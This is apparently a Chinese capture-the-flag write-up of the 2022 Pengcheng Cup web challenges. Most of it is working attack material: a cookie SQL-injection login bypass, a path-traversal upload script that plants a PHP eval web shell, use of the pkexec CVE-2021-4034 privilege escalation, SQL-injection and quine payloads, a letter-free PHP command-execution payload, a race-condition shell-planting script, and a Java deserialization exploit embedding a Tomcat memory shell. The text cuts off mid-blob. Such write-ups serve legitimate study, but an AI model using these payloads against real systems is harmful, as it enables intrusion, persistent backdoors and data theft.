2022鹏城杯web
2024-05-11 04:12:25
文章目录
- BY 恒星实验室
- 高手高手高高手 ()
- easygo (airrudder)
- 简单包含 ()
- can_u_login (airrudder)
- 简单的php (airrudder)
- 压缩包 ()
- easy_sql ()
- Ez_Java(xenny)
BY 恒星实验室
高手高手高高手 ()
扫描后台发现存在.git,利用githack工具拿到 .git 文件夹,利用 git log 查看 commit id,利用 git reset --hard be50c81b903b0005d0740d221e74c51340251bc2 进行恢复拿到源码。
通过后台扫描还发现存在login.php
根据底部信息获取到了cms类型以及版本号,直接网上搜相对应的漏洞。
发现了这么一条,说在login.php中存在sql注入漏洞。不过没有给poc。
但是可以根据产商给的补丁进行分析
其中对login.php的改动主要内容如下
更换了一条代码,其中第三个参数由原来的可控值改成了固定值,并且增加了第四个参数。
跟进protect函数。
接着跟进$DB->protect
对于我们来说的影响只有一条,就是会将单引号前面增加反斜杠。
跟进query_single
最主要的是进行了查询语句,并且查询语句中的$where是可控的,也就是
'cookie_hash = '.protect($_COOKIE['navigate-user'])
并且查询成功会跳转到首页(相当于登录成功)
将代码简单整理下,大致过程如下
<?php
function protect($str){
$str = str_replace("'", '\'."'", $str);$str = "'".$str."'";return $str;
}
$column='id';
$table='nv_users';
$str="";
$where='cookie_hash = '.protect($str);
$order='';
$sql='SELECT ' . $column . ' FROM ' . $table . ' WHERE ' . $where . $order . ' LIMIT 1';
echo $sql;
剩下的就是怎么传cookie可以生成万能密码。
因为过滤会在单引号前面增加反斜杠,所以可以自己写个反斜杠则可以转移掉。
也就是cookie传入navigate-user='||1# 即可登录成功。
进入后台后,还是搜下历史漏洞,其中有个引起了我的注意。
在navigate_upload.php中存在漏洞,接着继续看下补丁。
补丁中将这一整个if全部删除了,看来漏洞点就是这个地方了。
并且git获取到的源码中也确实存在这段代码。
简答分析一下
可以将上传的文件写入,但是还要传个id,并且最终拼接成了路径是已存在的文件。
也就是说可以覆盖已有文件。
那么我们可以直接覆盖一个php文件。首页里面有个navigate_info.php貌似没什么用。就覆盖他了。
问题来了,对传入的id进行了替换,将…/替换成了空。
不过不要紧,可以采用双写绕过的方式。
payload
#author:
import requests
sess=requests.session()
url="http://192.168.1.116/"
r1=sess.get(url+'login.php',headers={'Cookie':"navigate-user=\'||1#"})
url=url+"navigate_upload.php?session_id=31pukck2gfik0s84750cbvrdq2&engine=picnik&id=....//....//....//navigate_info.php"
files={'file':('1.php','<?=eval($_POST[1]);?>','image/png')}
r=sess.post(url,files=files)
print(r.text)
通过蚁剑连接后发现没有flag文件,但是存在一个可执行文件。
执行后没有出flag。
打开这个文件看下。
应该是需要删除掉网站根目录下的bocai.html、bocai.png,然后再来执行,不过暂时没有删除的权限,所以应该是需要提权了。
利用 find / -perm -4000 2>/dev/null 命令发现有 pkexec
直接用 CVE-2021-4034 进行提权
查看发现 bocai.html 和 bocai.png 不能删、不能移动,利用 chattr -a bocai* 命令去除该属性即可。
执行 ./I_want_capture_the_flag 拿到 flag:
easygo (airrudder)
下载附件,是 go.mod,里面有个 github 地址
查看发现就有利用方式
payload:
http://192.168.1.115:8080/juice/1' UNION SELECT 1,flag FROM super_secret_table--+
简单包含 ()
正常提交伪协议发现存在waf
经过反复测试,提交一定数量的参数即可绕过
payload
1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&flag=php://filter/convert.base64-encode/resource=flag.php
can_u_login (airrudder)
跟第五空间的 yet_another_mysql_injection 这道题一样,用的是 sqli quine,payload 也一样:
password='UNION/**/SELECT/**/REPLACE(REPLACE('"UNION/**/SELECT/**/REPLACE(REPLACE("1",CHAR(34),CHAR(39)),CHAR(49),"1")%23',CHAR(34),CHAR(39)),CHAR(49),'"UNION/**/SELECT/**/REPLACE(REPLACE("1",CHAR(34),CHAR(39)),CHAR(49),"1")%23')%23
简单的php (airrudder)
<?php
show_source(__FILE__);$code = $_GET['code'];if(strlen($code) > 80 or preg_match('/[A-Za-z0-9]|'|"|`| |,|.|-|+|=|/|\|<|>|$|?|^|&||/is',$code)){die(' Hello');}else if(';' === preg_replace('/[^s()]+?((?R)?)/', '', $code)){@eval($code);}
?>
很明显的无参RCE,然后还不能有数字字母,所以这里可以用取反绕过:
// phpinfo 的值
?code=[~%8f%97%8f%96%91%99%90][!%FF]();
同样的手段,构造出 system(current(getallheaders()));
?code=[~%8c%86%8c%8b%9a%92][!%FF]([~%9c%8a%8d%8d%9a%91%8b][!%FF]([~%98%9a%8b%9e%93%93%97%9a%9e%9b%9a%8d%8c][!%FF]()));
压缩包 ()
题目关键的地方如下
将我们上传的内容写到/tmp下,接着作为压缩包解压,然后经过一堆过滤后如果不满足则删除文件。
这样就会存在条件竞争的可能,并且解压后生成的文件路径可以通过计算获得。
1、将如下php内容压缩生成zip文件。
<?php
echo '11111';
file_put_contents('/var/www/html/x.php','<?php eval($_POST[1]);?>');
?>
2、条件竞争脚本如下
#author:
import io
import requests
import threading
import hashlib
import base64
url="http://192.168.1.110:8521/"
sess=requests.session()
s = open('a.zip','rb').read()
content=base64.b64encode(s)
data={'content':content}
i = hashlib.md5(content)
md=hashlib.md5(('/tmp/'+str(i.digest().hex())).encode())def write(session):while True:resp = session.post( url,data=data )
def read(session):while True:resp = session.get(url+f'static/upload/{md}/a.php')if resp.status_code==200:print('yes')
if __name__=="__main__":event=threading.Event()with requests.session() as session:for i in range(1,30): threading.Thread(target=write,args=(session,)).start()for i in range(1,30):threading.Thread(target=read,args=(session,)).start()event.set()
通过蚁剑连接x.php密码为1
根目录下拿到flag
easy_sql ()
扫描后台发现phpmyadmin
登录需要密码,盲猜用户名root
试了几个弱口令。
发现密码为password时登录成功,估计是非预期了。
用户名挨个试了一遍,发现使用用户名为SuperF1@g登录时直接出flag了。
Ez_Java(xenny)
ysoserial不出网http://novic4.cn/index.php/archives/26.html#cl-4
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.InvokerTransformer;
import javax.management.remote.JMXServiceURL;
import javax.management.remote.rmi.RMIConnector;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;
import java.util.PriorityQueue;
public class lab4exp {public static void main(String[] args) throws Exception {Map map=new HashMap<String,Integer>();String exp = "rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZZTaMLT7P4KxAwACSQAEc2l6ZUwACmNvbXBhcmF0b3J0ABZMamF2YS91dGlsL0NvbXBhcmF0b3I7eHAAAAACc3IAQm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9uczQuY29tcGFyYXRvcnMuVHJhbnNmb3JtaW5nQ29tcGFyYXRvci/5hPArsQjMAgACTAAJZGVjb3JhdGVkcQB+AAFMAAt0cmFuc2Zvcm1lcnQALUxvcmcvYXBhY2hlL2NvbW1vbnMvY29sbGVjdGlvbnM0L1RyYW5zZm9ybWVyO3hwc3IAQG9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9uczQuY29tcGFyYXRvcnMuQ29tcGFyYWJsZUNvbXBhcmF0b3L79JkluG6xNwIAAHhwc3IAO29yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9uczQuZnVuY3RvcnMuQ2hhaW5lZFRyYW5zZm9ybWVyMMeX7Ch6lwQCAAFbAA1pVHJhbnNmb3JtZXJzdAAuW0xvcmcvYXBhY2hlL2NvbW1vbnMvY29sbGVjdGlvbnM0L1RyYW5zZm9ybWVyO3hwdXIALltMb3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zNC5UcmFuc2Zvcm1lcjs5gTr7CNo/pQIAAHhwAAAAAnNyADxvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnM0LmZ1bmN0b3JzLkNvbnN0YW50VHJhbnNmb3JtZXJYdpARQQKxlAIAAUwACWlDb25zdGFudHQAEkxqYXZhL2xhbmcvT2JqZWN0O3hwdnIAN2NvbS5zdW4ub3JnLmFwYWNoZS54YWxhbi5pbnRlcm5hbC54c2x0Yy50cmF4LlRyQVhGaWx0ZXIAAAAAAAAAAAAAAHhwc3IAP29yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9uczQuZnVuY3RvcnMuSW5zdGFudGlhdGVUcmFuc2Zvcm1lcjSL9H+khtA7AgACWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7WwALaVBhcmFtVHlwZXN0ABJbTGphdmEvbGFuZy9DbGFzczt4cHVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAFzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3EAfgAUTAAFX25hbWV0ABJMamF2YS9sYW5nL1N0cmluZztMABFfb3V0cHV0UHJvcGVydGllc3QAFkxqYXZhL3V0aWwvUHJvcGVydGllczt4cAAAAAD/dXIAA1tbQkv9GRVnZ9s3AgAAeHAAAAACdXIAAltCrPMX+AYIVOACAAB4cAAANpHK/rq+AAAAMgKlCgC5AV8IAWAJAKIBYQgAvQkAogFiBwFjCgAGAV8KAAYBZAoABgFlCgCiAWYJAKIBZwgBaAoBaQFqCgAhAWsKACEBbAoBaQFtBwFuCgFpAW8KABEBcAoAEQFxCgAhAXIHAXMIAXQKAB4BdQgBdgoAHgF3CgF4AXkKACABeggBewcBfAcA2AcBfQcBfggBfwoAHgGACAGBCAGCCAGDCAGECAGFBwGGBwGHCAGICwApAYkIAYoKACEBiwcBjAcBjQgA8QcBjgcBjwgA8wgBkAgA9woAIQGRCAGSCgGTAZQKACEBlQgBlgoAIQGXCAGYCAGZCAGaBwGbCgGcAZ0KAZwBngoBnwGgCgBAAaEIAaIKAEABowoAQAGkCgAyAaUKAaYBpwgBqAsAKQGpCAGqCgAhAasHAawKAE4BXwoALwGtCAElCgBOAa4IAScIAQ4LACkBrwoBsAGxCAGyCgAeAbMKAbQBtQoBtAG2BwG3CAEEBwG4CgBdAbkIAQgHAboKAGABuwsBvAG9CwG+Ab8LAb4BwAcBwQsAZQHCCAHDCAHECgAhAcULAGUBxgcBxwoAawHICAHJCgBrAcoIAcsIAcwLAc0BzggBzwoB0AHRBwHSCgB0AdMKAdAB1AgB1QgB1gkB1wHYCgAeAdkKAXgBtQcB2goAfAFfCgB8AdsKAdAB3AoB3QHeCgHdAd8KAdcB4AoAIAGrCAHhCwApAeIKAKIB4woAogHkCQCiAeUHAeYHAecKAIkB6AcB6QcB6goAjQFfCwAqAaUKACEB6woBpgHsCgAgAWUKAI0B7QoAogHuCgAhAe8LAfAB8QgB8goBkwHzCgAGAfQIAfUHAfYKAJsB9wsB+AH5BwH6CgAeAfsIAU8HAfwHAqMKAKIBXwcB/goApAFfCgCkAf8KAKQCAAoAHgIBCgCkAgIKAJ4CAwcCBAoAqwFfCgCrAgUKAKsCAAkCBgIHCgIGAggKAKsCCQoAngIKBwILBwIMCgAeAg0KAg4BtQoCDgIPCwChAa4HAhAHAhEBAAJ4YwEAEkxqYXZhL2xhbmcvU3RyaW5nOwEABHBhc3MBAANtZDUBAAdwYXlsb2FkAQARTGphdmEvbGFuZy9DbGFzczsBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAPUx5c29zZXJpYWwvcGF5bG9hZHMvdGVtcGxhdGVzL1RvbWNhdEZpbHRlck1lbVNoZWxsRnJvbVRocmVhZDsBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEAAW0BAB1MamF2YS9zZWN1cml0eS9NZXNzYWdlRGlnZXN0OwEAAXMBAANyZXQBAA1TdGFja01hcFRhYmxlBwF+BwFzAQAMYmFzZTY0RW5jb2RlAQAWKFtCKUxqYXZhL2xhbmcvU3RyaW5nOwEAB0VuY29kZXIBABJMamF2YS9sYW5nL09iamVjdDsBAAZiYXNlNjQBAAFlAQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQACYnMBAAJbQgEABXZhbHVlAQAKRXhjZXB0aW9ucwEADGJhc2U2NERlY29kZQEAFihMamF2YS9sYW5nL1N0cmluZzspW0IBAAdkZWNvZGVyAQAJdHJhbnNmb3JtAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIZG9jdW1lbnQBAC1MY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTsBAAhoYW5kbGVycwEAQltMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwcCEgEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAEaW5pdAEAHyhMamF2YXgvc2VydmxldC9GaWx0ZXJDb25maWc7KVYBAAxmaWx0ZXJDb25maWcBABxMamF2YXgvc2VydmxldC9GaWx0ZXJDb25maWc7BwITAQAIZG9GaWx0ZXIBAFsoTGphdmF4L3NlcnZsZXQvU2VydmxldFJlcXVlc3Q7TGphdmF4L3NlcnZsZXQvU2VydmxldFJlc3BvbnNlO0xqYXZheC9zZXJ2bGV0L0ZpbHRlckNoYWluOylWAQAKZ2V0UmVxdWVzdAEAGkxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQALZ2V0UmVzcG9uc2UBAARjbWRzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEABnJlc3VsdAEAA2NtZAEABG5leHQBAAVFbnRyeQEADElubmVyQ2xhc3NlcwEAFUxqYXZhL3V0aWwvTWFwJEVudHJ5OwEACHBhcmFtS2V5AQAOcGFyYW1WYWx1ZUxpc3QBABVMamF2YS91dGlsL0FycmF5TGlzdDsBAAVmaWVsZAEAGUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsBAAtyZWFsUmVxdWVzdAEAJ0xvcmcvYXBhY2hlL2NhdGFsaW5hL2Nvbm5lY3Rvci9SZXF1ZXN0OwEAEmNveW90ZVJlcXVlc3RGaWVsZAEADWNveW90ZVJlcXVlc3QBABtMb3JnL2FwYWNoZS9jb3lvdGUvUmVxdWVzdDsBAApwYXJhbWV0ZXJzAQAoTG9yZy9hcGFjaGUvdG9tY2F0L3V0aWwvaHR0cC9QYXJhbWV0ZXJzOwEAD3BhcmFtSGFzaFZhbHVlcwEACHBhcmFtTWFwAQAZTGphdmEvdXRpbC9MaW5rZWRIYXNoTWFwOwEAFExqYXZhL3V0aWwvSXRlcmF0b3I7AQALcGFnZUNvbnRleHQBABNMamF2YS91dGlsL0hhc2hNYXA7AQAHc2Vzc2lvbgEAIExqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlc3Npb247AQABawEAAWMBABVMamF2YXgvY3J5cHRvL0NpcGhlcjsBAAZtZXRob2QBAA5ldmlsY2xhc3NfYnl0ZQEACWV2aWxjbGFzcwEADnVybENsYXNzTG9hZGVyAQAZTGphdmEvbmV0L1VSTENsYXNzTG9hZGVyOwEACWRlZk1ldGhvZAEABmFyck91dAEAH0xqYXZhL2lvL0J5dGVBcnJheU91dHB1dFN0cmVhbTsBAAFmAQAEZGF0YQEAC2xhc3RSZXF1ZXN0AQAMbGFzdFJlc3BvbnNlAQAOc2VydmxldFJlcXVlc3QBAB5MamF2YXgvc2VydmxldC9TZXJ2bGV0UmVxdWVzdDsBAA9zZXJ2bGV0UmVzcG9uc2UBAB9MamF2YXgvc2VydmxldC9TZXJ2bGV0UmVzcG9uc2U7AQALZmlsdGVyQ2hhaW4BABtMamF2YXgvc2VydmxldC9GaWx0ZXJDaGFpbjsBAAdyZXF1ZXN0AQAnTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3Q7AQAIcmVzcG9uc2UBAChMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVzcG9uc2U7AQAWTG9jYWxWYXJpYWJsZVR5cGVUYWJsZQEAUkxqYXZhL3V0aWwvTWFwJEVudHJ5PExqYXZhL2xhbmcvU3RyaW5nO0xqYXZhL3V0aWwvQXJyYXlMaXN0PExqYXZhL2xhbmcvU3RyaW5nOz47PjsBAClMamF2YS91dGlsL0FycmF5TGlzdDxMamF2YS9sYW5nL1N0cmluZzs+OwEAaExqYXZhL3V0aWwvSXRlcmF0b3I8TGphdmEvdXRpbC9NYXAkRW50cnk8TGphdmEvbGFuZy9TdHJpbmc7TGphdmEvdXRpbC9BcnJheUxpc3Q8TGphdmEvbGFuZy9TdHJpbmc7Pjs+Oz47BwKjBwIUBwIVBwIWBwGGBwGHBwF9BwIXBwD1BwGsBwIYBwIZBwG3BwG4BwIaBwG6BwIbBwHBBwHHBwIcAQABeAEAByhbQlopW0IBAAFaBwIdAQAHZGVzdHJveQEACDxjbGluaXQ+AQAEbmFtZQEAClVSTFBhdHRlcm4BABV3ZWJhcHBDbGFzc0xvYWRlckJhc2UBADJMb3JnL2FwYWNoZS9jYXRhbGluYS9sb2FkZXIvV2ViYXBwQ2xhc3NMb2FkZXJCYXNlOwEAD3N0YW5kYXJkQ29udGV4dAEAKkxvcmcvYXBhY2hlL2NhdGFsaW5hL2NvcmUvU3RhbmRhcmRDb250ZXh0OwEABmFDbGFzcwEAB0NvbmZpZ3MBAA1maWx0ZXJDb25maWdzAQAPTGphdmEvdXRpbC9NYXA7AQAOYmVoaW5kZXJGaWx0ZXIBAAlmaWx0ZXJEZWYBADFMb3JnL2FwYWNoZS90b21jYXQvdXRpbC9kZXNjcmlwdG9yL3dlYi9GaWx0ZXJEZWY7AQAJZmlsdGVyTWFwAQAxTG9yZy9hcGFjaGUvdG9tY2F0L3V0aWwvZGVzY3JpcHRvci93ZWIvRmlsdGVyTWFwOwEAC2NvbnN0cnVjdG9yAQAfTGphdmEvbGFuZy9yZWZsZWN0L0NvbnN0cnVjdG9yOwEAMkxvcmcvYXBhY2hlL2NhdGFsaW5hL2NvcmUvQXBwbGljYXRpb25GaWx0ZXJDb25maWc7AQA+TGphdmEvbGFuZy9DbGFzczwrTG9yZy9hcGFjaGUvY2F0YWxpbmEvY29yZS9TdGFuZGFyZENvbnRleHQ7PjsHAfYHAfoHAXwBAApTb3VyY2VGaWxlAQAjVG9tY2F0RmlsdGVyTWVtU2hlbGxGcm9tVGhyZWFkLmphdmEMAMEAwgEAEDNjNmUwYjhhOWMxNTIyNGEMALsAvAwAvQC8AQAXamF2YS9sYW5nL1N0cmluZ0J1aWxkZXIMAh4CHwwCIAIhDAC+AMgMAL4AvAEAA01ENQcCIgwCIwIkDAIlAiYMAicCKAwCKQIqAQAUamF2YS9tYXRoL0JpZ0ludGVnZXIMAisCJgwAwQIsDAIgAi0MAi4CIQEAE2phdmEvbGFuZy9FeGNlcHRpb24BABBqYXZhLnV0aWwuQmFzZTY0DAIvAjABAApnZXRFbmNvZGVyDAIxAjIHAhcMAjMCNAwCNQI2AQAOZW5jb2RlVG9TdHJpbmcBAA9qYXZhL2xhbmcvQ2xhc3MBABBqYXZhL2xhbmcvT2JqZWN0AQAQamF2YS9sYW5nL1N0cmluZwEAFnN1bi5taXNjLkJBU0U2NEVuY29kZXIMAjcCOAEABmVuY29kZQEACmdldERlY29kZXIBAAZkZWNvZGUBABZzdW4ubWlzYy5CQVNFNjREZWNvZGVyAQAMZGVjb2RlQnVmZmVyAQAlamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVxdWVzdAEAJmphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlc3BvbnNlAQAHUmVmZXJlcgwCOQDIAQAXaHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS8MAjoCOwEAK29yZy9hcGFjaGUvY2F0YWxpbmEvY29ubmVjdG9yL1JlcXVlc3RGYWNhZGUBACNqYXZheC9zZXJ2bGV0L1NlcnZsZXRSZXF1ZXN0V3JhcHBlcgEALG9yZy9hcGFjaGUvY2F0YWxpbmEvY29ubmVjdG9yL1Jlc3BvbnNlRmFjYWRlAQAkamF2YXgvc2VydmxldC9TZXJ2bGV0UmVzcG9uc2VXcmFwcGVyAQANeC1jbGllbnQtZGF0YQwCPAI9AQAHb3MubmFtZQcCPgwCPwDIDAJAAiEBAAN3aW4MAkECQgEAAi9jAQAJL2Jpbi9iYXNoAQACLWMBABFqYXZhL3V0aWwvU2Nhbm5lcgcCQwwCRAJFDAJGAkcHAkgMAkkCSgwAwQJLAQACXEEMAkwCTQwA+AIhDAJOAk8HAlAMAlECUgEACHJlYmV5b25kDAIxAiEBAARQT1NUDAJTAlQBABFqYXZhL3V0aWwvSGFzaE1hcAwCVQJWDAJXAlgMAlkCWgcCWwwCXAIhAQAADAJdAl4HAhkMAl8CYAwCYQJiAQAlb3JnL2FwYWNoZS9jYXRhbGluYS9jb25uZWN0b3IvUmVxdWVzdAEAGW9yZy9hcGFjaGUvY295b3RlL1JlcXVlc3QMAmMCZAEAF2phdmEvdXRpbC9MaW5rZWRIYXNoTWFwDAJlAmYHAmcMAOYCaAcCGwwCaQI9DAD4AjgBABNqYXZhL3V0aWwvTWFwJEVudHJ5DAJqAjgBAAEgAQABKwwCawJsDAJtAjgBABNqYXZhL3V0aWwvQXJyYXlMaXN0DAJuAigBAAE9DAJhAm8BABBlNDVlMzI5ZmViNWQ5MjViAQABdQcCGAwCcAJxAQADQUVTBwIdDAIjAnIBAB9qYXZheC9jcnlwdG8vc3BlYy9TZWNyZXRLZXlTcGVjDADBAnMMAOoCdAEAFWphdmEubGFuZy5DbGFzc0xvYWRlcgEAC2RlZmluZUNsYXNzBwJ1DAJ2AMAMAncCMgEAFnN1bi9taXNjL0JBU0U2NERlY29kZXIMAYUA3AwCeAJ5BwJ6DAJ7AnwMAn0CfgwCfwKAAQAIZ29kemlsbGEMAoEAyAwA2wDcDAFBAUIMAL8AwAEAF2phdmEvbmV0L1VSTENsYXNzTG9hZGVyAQAMamF2YS9uZXQvVVJMDADBAoIBABVqYXZhL2xhbmcvQ2xhc3NMb2FkZXIBAB1qYXZhL2lvL0J5dGVBcnJheU91dHB1dFN0cmVhbQwCgwKEDAKFAlIMAoYCJgwA0ADRDAKDAi0HAhYMAO8ChwEAD015RmlsdGVyVmVyc2lvbgwCiAKJDAIeAooBAAIvKgEAMG9yZy9hcGFjaGUvY2F0YWxpbmEvbG9hZGVyL1dlYmFwcENsYXNzTG9hZGVyQmFzZQwCiwKMBwKNDAKOAo8BAChvcmcvYXBhY2hlL2NhdGFsaW5hL2NvcmUvU3RhbmRhcmRDb250ZXh0DAKQAjYBAA1qYXZhL3V0aWwvTWFwAQA7eXNvc2VyaWFsL3BheWxvYWRzL3RlbXBsYXRlcy9Ub21jYXRGaWx0ZXJNZW1TaGVsbEZyb21UaHJlYWQBAC9vcmcvYXBhY2hlL3RvbWNhdC91dGlsL2Rlc2NyaXB0b3Ivd2ViL0ZpbHRlckRlZgwCkQKSDAKTAlIMApQCIQwClQJSDAKWApcBAC9vcmcvYXBhY2hlL3RvbWNhdC91dGlsL2Rlc2NyaXB0b3Ivd2ViL0ZpbHRlck1hcAwCmAJSBwKZDAKaApsMAUcCIQwCnAJSDAKdAp4BADBvcmcvYXBhY2hlL2NhdGFsaW5hL2NvcmUvQXBwbGljYXRpb25GaWx0ZXJDb25maWcBABtvcmcvYXBhY2hlL2NhdGFsaW5hL0NvbnRleHQMAp8CoAcCoQwCNwKiAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAFGphdmF4L3NlcnZsZXQvRmlsdGVyAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAeamF2YXgvc2VydmxldC9TZXJ2bGV0RXhjZXB0aW9uAQAcamF2YXgvc2VydmxldC9TZXJ2bGV0UmVxdWVzdAEAHWphdmF4L3NlcnZsZXQvU2VydmxldFJlc3BvbnNlAQAZamF2YXgvc2VydmxldC9GaWx0ZXJDaGFpbgEAGGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZAEAHmphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2Vzc2lvbgEAF2phdmEvbGFuZy9yZWZsZWN0L0ZpZWxkAQAmb3JnL2FwYWNoZS90b21jYXQvdXRpbC9odHRwL1BhcmFtZXRlcnMBABJqYXZhL3V0aWwvSXRlcmF0b3IBABNqYXZhL2lvL0lPRXhjZXB0aW9uAQATamF2YXgvY3J5cHRvL0NpcGhlcgEABmFwcGVuZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmdCdWlsZGVyOwEACHRvU3RyaW5nAQAUKClMamF2YS9sYW5nL1N0cmluZzsBABtqYXZhL3NlY3VyaXR5L01lc3NhZ2VEaWdlc3QBAAtnZXRJbnN0YW5jZQEAMShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvc2VjdXJpdHkvTWVzc2FnZURpZ2VzdDsBAAhnZXRCeXRlcwEABCgpW0IBAAZsZW5ndGgBAAMoKUkBAAZ1cGRhdGUBAAcoW0JJSSlWAQAGZGlnZXN0AQAGKElbQilWAQAVKEkpTGphdmEvbGFuZy9TdHJpbmc7AQALdG9VcHBlckNhc2UBAAdmb3JOYW1lAQAlKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL0NsYXNzOwEACWdldE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBAAZpbnZva2UBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAAhnZXRDbGFzcwEAEygpTGphdmEvbGFuZy9DbGFzczsBAAtuZXdJbnN0YW5jZQEAFCgpTGphdmEvbGFuZy9PYmplY3Q7AQAJZ2V0SGVhZGVyAQAQZXF1YWxzSWdub3JlQ2FzZQEAFShMamF2YS9sYW5nL1N0cmluZzspWgEAB2lzRW1wdHkBAAMoKVoBABBqYXZhL2xhbmcvU3lzdGVtAQALZ2V0UHJvcGVydHkBAAt0b0xvd2VyQ2FzZQEACGNvbnRhaW5zAQAbKExqYXZhL2xhbmcvQ2hhclNlcXVlbmNlOylaAQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAKChbTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBABFqYXZhL2xhbmcvUHJvY2VzcwEADmdldElucHV0U3RyZWFtAQAXKClMamF2YS9pby9J